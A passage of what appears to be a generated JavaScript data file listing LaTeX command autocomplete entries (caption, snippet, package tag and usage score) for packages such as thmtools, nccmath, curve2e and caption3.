'\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'wallpaper-cmd', + score: 0.004649150613625593, + }, + { + caption: '\\ifthenelse{}{}{}', + snippet: '\\ifthenelse{$1}{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\ifthenelse{}', + snippet: '\\ifthenelse{$1}', + meta: 'wallpaper-cmd', + score: 0.009331077109224957, + }, + { + caption: '\\setboolean{}{}', + snippet: '\\setboolean{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.0012203054938872515, + }, + { + caption: '\\newboolean{}', + snippet: '\\newboolean{$1}', + meta: 'wallpaper-cmd', + score: 0.0009170966832172938, + }, + { + caption: '\\value{}', + snippet: '\\value{$1}', + meta: 'wallpaper-cmd', + score: 0.01590723355124104, + }, + { + caption: '\\boolean{}', + snippet: '\\boolean{$1}', + meta: 'wallpaper-cmd', + score: 0.0018957469739775527, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'wallpaper-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'wallpaper-cmd', + score: 0.008565354665444157, + }, + ], + newunicodechar: [ + { + caption: '\\newunicodechar{}{}', + snippet: '\\newunicodechar{$1}{$2}', + meta: 'newunicodechar-cmd', + score: 8.718084183564492e-5, + }, + ], + thmtools: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'thmtools-cmd', + score: 0.00037306820619479756, + }, + { + caption: '\\listtheoremname', + snippet: '\\listtheoremname', + meta: 'thmtools-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\thmtformatoptarg', + snippet: '\\thmtformatoptarg', + 
meta: 'thmtools-cmd', + score: 6.353668036093916e-5, + }, + { + caption: '\\listoftheorems[]', + snippet: '\\listoftheorems[$1]', + meta: 'thmtools-cmd', + score: 1.9443373798666845e-5, + }, + { + caption: '\\declaretheoremstyle[]{}', + snippet: '\\declaretheoremstyle[$1]{$2}', + meta: 'thmtools-cmd', + score: 0.0001168034231635369, + }, + { + caption: '\\declaretheorem[]{}', + snippet: '\\declaretheorem[$1]{$2}', + meta: 'thmtools-cmd', + score: 0.0004904790216915127, + }, + { + caption: '\\theoremstyle{}', + snippet: '\\theoremstyle{$1}', + meta: 'thmtools-cmd', + score: 0.02533412165007986, + }, + { + caption: '\\proof{}', + snippet: '\\proof{$1}', + meta: 'thmtools-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\proof', + snippet: '\\proof', + meta: 'thmtools-cmd', + score: 0.000701497773639073, + }, + { + caption: '\\newtheorem{}[]{}', + snippet: '\\newtheorem{$1}[$2]{$3}', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}', + snippet: '\\newtheorem{$1}{$2}', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\newtheorem{}{}[]', + snippet: '\\newtheorem{$1}{$2}[$3]', + meta: 'thmtools-cmd', + score: 0.215689795055434, + }, + { + caption: '\\endproof', + snippet: '\\endproof', + meta: 'thmtools-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\endproof{}', + snippet: '\\endproof{$1}', + meta: 'thmtools-cmd', + score: 0.0006133100544751855, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'thmtools-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'thmtools-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'thmtools-cmd', + score: 0.008565354665444157, + }, + ], + nccmath: [ + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nccmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'nccmath-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'nccmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'nccmath-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'nccmath-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'nccmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'nccmath-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'nccmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'nccmath-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'nccmath-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'nccmath-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'nccmath-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + 
snippet: '\\nonumber', + meta: 'nccmath-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'nccmath-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'nccmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'nccmath-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'nccmath-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'nccmath-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'nccmath-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'nccmath-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'nccmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'nccmath-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + snippet: '\\pmod', + meta: 'nccmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'nccmath-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'nccmath-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'nccmath-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'nccmath-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'nccmath-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'nccmath-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'nccmath-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'nccmath-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'nccmath-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'nccmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'nccmath-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'nccmath-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'nccmath-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 
'nccmath-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'nccmath-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'nccmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'nccmath-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'nccmath-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'nccmath-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'nccmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'nccmath-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'nccmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'nccmath-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'nccmath-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 'nccmath-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'nccmath-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'nccmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'nccmath-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'nccmath-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'nccmath-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'nccmath-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'nccmath-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'nccmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'nccmath-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'nccmath-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'nccmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'nccmath-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'nccmath-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'nccmath-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 
'nccmath-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'nccmath-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'nccmath-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'nccmath-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'nccmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'nccmath-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'nccmath-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'nccmath-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'nccmath-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'nccmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'nccmath-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'nccmath-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'nccmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'nccmath-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'nccmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'nccmath-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'nccmath-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'nccmath-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'nccmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'nccmath-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'nccmath-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'nccmath-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'nccmath-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'nccmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'nccmath-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'nccmath-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'nccmath-cmd', + score: 
0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'nccmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'nccmath-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'nccmath-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'nccmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'nccmath-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'nccmath-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'nccmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'nccmath-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'nccmath-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'nccmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'nccmath-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'nccmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'nccmath-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'nccmath-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'nccmath-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'nccmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'nccmath-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'nccmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'nccmath-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'nccmath-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'nccmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'nccmath-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'nccmath-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'nccmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'nccmath-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'nccmath-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'nccmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'nccmath-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'nccmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'nccmath-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'nccmath-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'nccmath-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + 
meta: 'nccmath-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'nccmath-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'nccmath-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'nccmath-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'nccmath-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'nccmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\Pr[]', + snippet: '\\Pr[$1]', + meta: 'nccmath-cmd', + score: 0.010227440663206161, + }, + { + caption: '\\tanh', + snippet: '\\tanh', + meta: 'nccmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\tanh{}', + snippet: '\\tanh{$1}', + meta: 'nccmath-cmd', + score: 0.0021229156376192525, + }, + { + caption: '\\arcsin', + snippet: '\\arcsin', + meta: 'nccmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\arcsin{}', + snippet: '\\arcsin{$1}', + meta: 'nccmath-cmd', + score: 0.0007754886988089101, + }, + { + caption: '\\DeclareMathOperator{}{}', + snippet: '\\DeclareMathOperator{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.029440493885398676, + }, + { + caption: '\\csc', + snippet: '\\csc', + meta: 'nccmath-cmd', + score: 0.00013963711107573638, + }, + { + caption: '\\sup', + snippet: '\\sup', + meta: 'nccmath-cmd', + score: 0.009355514755312534, + }, + { + caption: '\\sec', + snippet: '\\sec', + meta: 'nccmath-cmd', + score: 0.0005912636157903734, + }, + { + caption: '\\varprojlim', + snippet: '\\varprojlim', + meta: 'nccmath-cmd', + score: 0.0004286136584068833, + }, + { + caption: '\\stepcounter{}', + snippet: '\\stepcounter{$1}', + meta: 'nccmath-cmd', + score: 0.0030745841706804776, + }, + { + caption: '\\addtocounter{}{}', + snippet: '\\addtocounter{$1}{$2}', + meta: 'nccmath-cmd', + score: 0.010241823778997489, + }, + { + caption: '\\text{}', + snippet: '\\text{$1}', + meta: 'nccmath-cmd', + score: 0.3608680734736821, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'nccmath-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'nccmath-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\frenchspacing', + snippet: '\\frenchspacing', + meta: 'nccmath-cmd', + score: 0.0063276692758974925, + }, + ], + scrtime: [ + { + caption: '\\newpage', + snippet: '\\newpage', + meta: 'scrtime-cmd', + score: 0.3277033727934986, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'scrtime-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\addtokomafont{}{}', + snippet: '\\addtokomafont{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.0008555564394100388, + }, + { + caption: '\\setkomafont{}{}', + snippet: '\\setkomafont{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.012985816912639263, + }, + { + caption: '\\KOMAoptions{}', + snippet: '\\KOMAoptions{$1}', + meta: 'scrtime-cmd', + score: 0.000396664302361659, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'scrtime-cmd', + score: 0.00037306820619479756, + }, + ], + luainputenc: [ + { + caption: '\\RequireXeTeX', + snippet: '\\RequireXeTeX', + meta: 'luainputenc-cmd', + score: 0.00021116765384691477, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'luainputenc-cmd', + score: 0.008565354665444157, + }, + ], + curve2e: [ + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'curve2e-cmd', + score: 0.00022468880600368487, 
+ }, + { + caption: '\\put', + snippet: '\\put', + meta: 'curve2e-cmd', + score: 0.0406766030275089, + }, + { + caption: '\\fcolorbox{}{}{}', + snippet: '\\fcolorbox{$1}{$2}{$3}', + meta: 'curve2e-cmd', + score: 0.00926923425734719, + }, + { + caption: '\\textcolor{}{}', + snippet: '\\textcolor{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.20852115286477566, + }, + { + caption: '\\pagecolor{}', + snippet: '\\pagecolor{$1}', + meta: 'curve2e-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\pagecolor{}{}', + snippet: '\\pagecolor{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.0008147200475678891, + }, + { + caption: '\\definecolor{}{}{}', + snippet: '\\definecolor{$1}{$2}{$3}', + meta: 'curve2e-cmd', + score: 0.16906710888680052, + }, + { + caption: '\\colorbox{}{}', + snippet: '\\colorbox{$1}{$2}', + meta: 'curve2e-cmd', + score: 0.029302172361548254, + }, + { + caption: '\\color[]{}', + snippet: '\\color[$1]{$2}', + meta: 'curve2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\color{}', + snippet: '\\color{$1}', + meta: 'curve2e-cmd', + score: 0.2864294797053033, + }, + { + caption: '\\Line', + snippet: '\\Line', + meta: 'curve2e-cmd', + score: 0.0006078790177929149, + }, + { + caption: '\\polygon', + snippet: '\\polygon', + meta: 'curve2e-cmd', + score: 0.0008987552240147395, + }, + { + caption: '\\line', + snippet: '\\line', + meta: 'curve2e-cmd', + score: 0.014519741542622297, + }, + { + caption: '\\polyline', + snippet: '\\polyline', + meta: 'curve2e-cmd', + score: 0.00022468880600368487, + }, + { + caption: '\\vector', + snippet: '\\vector', + meta: 'curve2e-cmd', + score: 0.002970308722584179, + }, + ], + couriers: [ + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'couriers-cmd', + score: 0.00037306820619479756, + }, + ], + caption3: [ + { + caption: '\\DeclareCaptionJustification{}{}', + snippet: '\\DeclareCaptionJustification{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\DeclareCaptionLabelSeparator{}{}', + snippet: '\\DeclareCaptionLabelSeparator{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0003890810058478364, + }, + { + caption: '\\DeclareCaptionFormat{}{}', + snippet: '\\DeclareCaptionFormat{$1}{$2}', + meta: 'caption3-cmd', + score: 0.0004717618449370015, + }, + { + caption: '\\DeclareCaptionFont{}{}', + snippet: '\\DeclareCaptionFont{$1}{$2}', + meta: 'caption3-cmd', + score: 5.0133404990680195e-5, + }, + { + caption: '\\DeclareCaptionSubType[]{}', + snippet: '\\DeclareCaptionSubType[$1]{$2}', + meta: 'caption3-cmd', + score: 0.0001872850414971473, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'caption3-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'caption3-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\captionsetup{}', + snippet: '\\captionsetup{$1}', + meta: 'caption3-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\captionsetup[]{}', + snippet: '\\captionsetup[$1]{$2}', + meta: 'caption3-cmd', + score: 0.02900783226643065, + }, + { + caption: '\\string', + snippet: '\\string', + meta: 'caption3-cmd', + score: 0.001042697111754002, + }, + { + caption: '\\DeclareCaptionType{}[][]', + snippet: '\\DeclareCaptionType{$1}[$2][$3]', + meta: 'caption3-cmd', + score: 0.00015256647321237863, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'caption3-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\footnote{}', + snippet: '\\footnote{$1}', + meta: 
'caption3-cmd', + score: 0.2253056071787701, + }, + { + caption: '\\footnotemark[]', + snippet: '\\footnotemark[$1]', + meta: 'caption3-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\footnotemark', + snippet: '\\footnotemark', + meta: 'caption3-cmd', + score: 0.021473212893597875, + }, + { + caption: '\\setkeys{}{}', + snippet: '\\setkeys{$1}{$2}', + meta: 'caption3-cmd', + score: 0.00037306820619479756, + }, + ], + gauss: [ + { + caption: '\\pmb{}', + snippet: '\\pmb{$1}', + meta: 'gauss-cmd', + score: 0.019171182556792562, + }, + { + caption: '\\boldsymbol{}', + snippet: '\\boldsymbol{$1}', + meta: 'gauss-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\boldsymbol', + snippet: '\\boldsymbol', + meta: 'gauss-cmd', + score: 0.18137737738638837, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'gauss-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'gauss-cmd', + 